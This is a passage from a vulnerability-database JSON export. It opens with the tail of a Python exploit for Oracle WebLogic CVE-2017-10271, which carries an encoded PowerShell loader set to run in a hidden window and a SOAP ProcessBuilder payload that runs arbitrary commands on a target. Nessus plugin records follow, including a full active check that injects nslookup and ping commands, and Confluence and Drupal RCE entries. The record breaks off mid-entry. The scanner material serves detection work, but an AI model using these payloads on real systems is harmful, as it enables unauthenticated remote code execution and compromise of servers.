AEEAdwA3AEsAVABMAE8AUgA0ACsATgBLAEcAeQBPAEgAVwBlAEIAawBZAFYAYQBvADAAMwB2AEgAVABNAEgAdwA3AGEASgBoAGkAMQB6AGcASwArADQAYwAzAHIAVQBOAEcAcAAzAC8AbQBPAHIAZgBUAGYARwB2AFkAagA1AG4AYQA1AFIAbQA0AHkAUgBqAHgATABqAEoAcAB6AFgAegBxADcAbQBzAGMAUQBKAGgAKwBhAGoASwBXAFYAUQAvADIANwBUAE4AawBEAEcAcQBhAE4AdQAvAFkAUgB1ADcAeAA0AEgAbgBSAEMAMQBRAEcAWQBVAGMAWQBUAGIAOQBHAEYANABOAEEAYQBiAGwAegBlAGcAYwB6AHUAcwArAFIAeQBKADIAQgBvAGIAeABpAGcAMABRAGgAUwA0ADgAdwBsAEcASgBrAGkAYgBqADYAaAB0ADgAcwBiAG0AZwAyAE0ANwB4AG0AaAAwAE0AcQAvAGQAUAA5AFQAbQA0AEQATQBaAHIAegA3AFkAUABYAFQAVQA5AGgAegBEAE0ASQA2AGkAZQAvAGcAMQBrAEcAYwB2ADEALwBIAFkAZgBEAHAAYgBQAFEAbgBjAHUAdwBYAGIATgA4AGIANQA4AE8ATgBiAHkAUgBFAGcAUwBTAGsAeQBhADgAMABYAHUAZgA5AFIAeQA3AFoAeABrAHMANAB4AEEAMAA1AEEATQB5ADcASwBzAE0AMgBUAGQAdAA1AGUASABVADYAbABoAHEAYgBKAEsALwBtAEIASgBEAEYAaABjAEsAUABCAG4AVgBlAFEARwBUAEgARwBQAGQAbgBjAG8AUQAvAEQAdABiAEoAdgA5AHYATAB1AEcAYwBMAHcAOQBPAFQAVgBrAGEANAA4AEMAKwBwAGYAZQAzADYAeABkAEgARgB4AEIAeQA1AEMAZABlAHoANABXACsAbQBUAE8AQgBUAHoAYwBuAFYAOQBXAHEAMQBDAEQANgArAHUANgAxAFcASQA4AGQAZgBqAGEAdgBEAGwAUgB0AHYAYgBLAHMAdABMAFkASQBmAE0AcwAzAFcAMgBzADYANwBMAHUAaQBrAHQAKwA2AFAALwBGAGIARwA4AFYAdQBmAHcANQAvADgAYwBzAGEAOQByAFAAOQBuADkASgBSAFMAcgA1AFgAMgA4ADMAeQAxAC8AdQAvAEIAYgBpAFAANQB1ADMATABlAFkAQwBoAEIAMABvAGQARQB3AHMAcgAvAG4AWABnAHMALwA1ADgAYQBMAGwAdwBCAEkAQwBPAFEAOQB5AEIALwA1AEMAbgBlAFYAaQBlAE4ATABlAEQAVgA0AGMALwBnAFAAeQBrAHYAWgBDAGkAdwBLAEEAQQBBAD0AJwAnACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==\"\n\nurl = sys.argv[1]\n\nrequest_headers = {\"Accept-Encoding\": \"gzip, deflate\", \"Accept\": \"*/*\", \"Accept-Language\": \"en\", \"User-Agent\": \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\", \"Connection\": \"close\", \"Content-Type\": \"text/xml\"}\ndata=\"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" xmlns:wsa=\\\"http://www.w3.org/2005/08/addressing\\\" xmlns:asy=\\\"http://www.bea.com/async/AsyncResponseService\\\">\\r\\n <soapenv:Header>\\r\\n <wsa:Action>xx</wsa:Action>\\r\\n <wsa:RelatesTo>xx</wsa:RelatesTo>\\r\\n <work:WorkContext xmlns:work=\\\"http://bea.com/2004/06/soap/workarea/\\\">\\r\\n <void class=\\\"java.lang.ProcessBuilder\\\">\\r\\n <array class=\\\"java.lang.String\\\" length=\\\"3\\\">\\r\\n <void index=\\\"0\\\">\\r\\n <string>cmd</string>\\r\\n </void>\\r\\n <void index=\\\"1\\\">\\r\\n <string>/c</string>\\r\\n </void>\\r\\n <void index=\\\"2\\\">\\r\\n <string>%s</string>\\r\\n </void>\\r\\n </array>\\r\\n <void method=\\\"start\\\"/></void>\\r\\n </work:WorkContext>\\r\\n </soapenv:Header>\\r\\n <soapenv:Body>\\r\\n <asy:onAsyncDelivery/>\\r\\n </soapenv:Body>\\r\\n</soapenv:Envelope>\" % (exploit)\nresponse = requests.post(url, headers=request_headers, data=data)\nprint \"status_code:%s\" % str(response.status_code)\nprint(response)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-07-17T16:28:58", "description": "The remote Oracle WebLogic server is affected by a remote code execution vulnerability in the WSAT endpoint due to unsafe deserialization of XML encoded Java objects. An unauthenticated, remote attacker can exploit this, via a crafted Java object, to execute arbitrary Java code in the context of the WebLogic server.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-12-28T00:00:00", "type": "nessus", "title": "Oracle WebLogic WSAT Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server"], "id": "WEBLOGIC_2017_10271.NASL", "href": "https://www.tenable.com/plugins/nessus/105484", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105484);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-10271\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n\n script_name(english:\"Oracle WebLogic WSAT Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the WSAT endpoint due to unsafe\ndeserialization of XML encoded Java objects. An unauthenticated,\nremote attacker can exploit this, via a crafted Java object, \nto execute arbitrary Java code in the context of the WebLogic\nserver.\");\n # https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b680917f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle WebLogic wls-wsat Component Deserialization RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"weblogic_detect.nasl\");\n script_require_keys(\"www/weblogic\");\n script_require_ports(\"Services/www\", 80, 7001);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nappname = \"Oracle WebLogic Server\";\n\nget_kb_item_or_exit(\"www/weblogic\");\nport = get_http_port(default:7001, embedded:FALSE);\nget_kb_item_or_exit(\"www/weblogic/\" + port + \"/installed\");\n\n# establish if WSAT is enabled. If it isn't then we don't\n# need to proceed any futher\nres = http_send_recv3(\n method:'GET',\n item:'/wls-wsat/CoordinatorPortType',\n port:port,\n exit_on_fail:TRUE);\nif (empty_or_null(res) || '404' >< res[0])\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# generate a unique pattern for each execution. unixtime() is not\n# granular enough since there may be many installs and this script\n# could be running in parallel\npattern = hexstr(rand_str(length:8));\n\n# create the HTTP request that will execute the DNS lookup. We'll try to execute\n# via both cmd and sh since we have no real insight into the remote OS.\n# Because some minimal Linux installs don't include nslookup, we'll also fallback\n# on using ping if necessary... although I think that is mostly paranoia.\nns_lookup = 'nslookup weblogic-2017-10271-' + pattern + ' ' + compat::this_host();\nxml_encoded_java =\n'<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">' +\n '<soapenv:Header>' +\n '<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">' +\n '<java>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>cmd.exe</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>/c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>ping -c 10 -p ' + pattern + ' ' + compat::this_host() + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '</java>' +\n '</work:WorkContext>' +\n '</soapenv:Header>' +\n '<soapenv:Body/>' +\n'</soapenv:Envelope>';\nrequest =\n 'POST /wls-wsat/CoordinatorPortType HTTP/1.1\\r\\n' +\n 'Host: ' + get_host_ip() + ':' + port + '\\r\\n' +\n 'Content-Type: text/xml\\r\\n' +\n 'Content-Length: ' + len(xml_encoded_java) + '\\r\\n' +\n '\\r\\n' +\n xml_encoded_java;\n\nsoc = open_sock_tcp(port);\nif (!soc)\n{\n audit(AUDIT_SOCK_FAIL, port, appname);\n}\n\nfilter = \"(ip and udp and port 53 and src host \" + get_host_ip() + \") or (icmp and icmp[0] = 8 and src host \" + get_host_ip() + \")\";\nresponse = send_capture(socket:soc, data:request, pcap_filter:filter);\nclose(soc);\n\nif (empty_or_null(response))\n{\n # looks like we didn't execute anything on the host\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# We can directly search the DNS response\nif (pattern >!< response)\n{\n # maybe this is an ICMP response?\n icmp_data = tolower(hexstr(get_icmp_element(icmp:response, element:\"data\")));\n if (empty_or_null(icmp_data))\n {\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n }\n\n if (pattern >!< icmp_data)\n {\n # couldn't find the pattern in the ICMP data\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n } \n}\n\nreport =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-13T16:30:20", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled.\n\nThe affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-01T00:00:00", "type": "nessus", "title": "Atlassian Confluence Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-08T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112944", "href": "https://www.tenable.com/plugins/was/112944", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T15:36:25", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 7.5.x < 7.11.6 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112963", "href": "https://www.tenable.com/plugins/was/112963", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-23T14:50:43", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-08-26T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.13.23 / 6.14 < 7.4.11 / 7.5 < 7.11.6 / 7.12 < 7.12.5 Webwork OGNL Injection (CONFSERVER-67940)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CONFSERVER-67940.NASL", "href": "https://www.tenable.com/plugins/nessus/152864", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152864);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2021-26084\");\n script_xref(name:\"IAVA\", value:\"2021-A-0397\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Atlassian Confluence < 6.13.23 / 6.14 < 7.4.11 / 7.5 < 7.11.6 / 7.12 < 7.12.5 Webwork OGNL Injection (CONFSERVER-67940)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by an OGNL injection vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian Confluence application running on the remote host is \nprior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection\nvulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute\narbitrary code on a Confluence Server or Data Center instance.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cb62fdb\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/CONFSERVER-67940\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 6.13.23, 7.4.11, 7.11.6, 7.12.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26084\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence WebWork OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nvar port = get_http_port(default:80);\nvar app_info = vcf::get_app_info(app:'confluence', port:port, webapp:true);\n\nvar constraints = [\n {'fixed_version' : '6.13.23' },\n {'min_version' : '6.14', 'fixed_version' : '7.4.11' },\n {'min_version' : '7.5', 'fixed_version' : '7.11.6' },\n {'min_version' : '7.12', 'fixed_version' : '7.12.5', 'fixed_display' : '7.12.5 / 7.13.0'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:30:18", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 6.14.x < 7.4.11 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112962", "href": "https://www.tenable.com/plugins/was/112962", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:30:17", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.13.23 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112961", "href": "https://www.tenable.com/plugins/was/112961", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-15T22:22:59", "description": "The remote Atlassian Confluence application running on the remote host is affected by an OGNL injection vulnerability that would allow an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance by sending a specially crafted HTTP request.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-07T00:00:00", "type": "nessus", "title": "Atlassian Confluence Server Webwork OGNL Injection (CVE-2021-26084)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2022-08-15T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE_2021_26084.NBIN", "href": "https://www.tenable.com/plugins/nessus/153087", "sourceData": "Binary data confluence_cve_2021_26084.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:30:20", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 7.12.x < 7.12.5 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112964", "href": "https://www.tenable.com/plugins/was/112964", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T15:59:03", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.1.x < 8.5.1 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98568", "href": "https://www.tenable.com/plugins/was/98568", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T15:59:09", "description": "According to its self-reported version number, the detected Drupal application is affected by a remote code execution vulnerability.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-05T00:00:00", "type": "nessus", "title": "Drupal 8.4.x < 8.4.6 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98565", "href": "https://www.tenable.com/plugins/was/98565", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-15T14:24:05", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.\n\nNote: This has been detected using an active check and should be remediated immediately.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-22T00:00:00", "type": "nessus", "title": "Drupal < 7.58 / 8.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-09-07T00:00:00", "cpe": [], "id": "WEB_APPLICATION_SCANNING_98216", "href": "https://www.tenable.com/plugins/was/98216", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:33", "description": "The version of Drupal installed on the remote server is 8.x prior to 8.3.9, and is affected by a flaw in the 'preHandle()' function in 'core/lib/Drupal/Core/DrupalKernel.php' that is triggered as certain parameter keys within HTTP requests are not properly sanitized. This may allow a remote attacker to execute arbitrary code. This issue may be exploited using multiple unspecified attack vectors.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Drupal 8.x < 8.3.9 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "700228.PRM", "href": "https://www.tenable.com/plugins/nnm/700228", "sourceData": "Binary data 700228.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:32:34", "description": "The version of Drupal installed on the remote server is 7.x prior to 7.58, and is affected by a flaw in the 'preHandle()' function in 'core/lib/Drupal/Core/DrupalKernel.php' that is triggered as certain parameter keys within HTTP requests are not properly sanitized. This may allow a remote attacker to execute arbitrary code. This issue may be exploited using multiple unspecified attack vectors.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.58 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*"], "id": "700224.PRM", "href": "https://www.tenable.com/plugins/nnm/700224", "sourceData": "Binary data 700224.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:32:34", "description": "The version of Drupal installed on the remote server is 8.5.x prior to 8.5.1, and is affected by a flaw in the 'preHandle()' function in 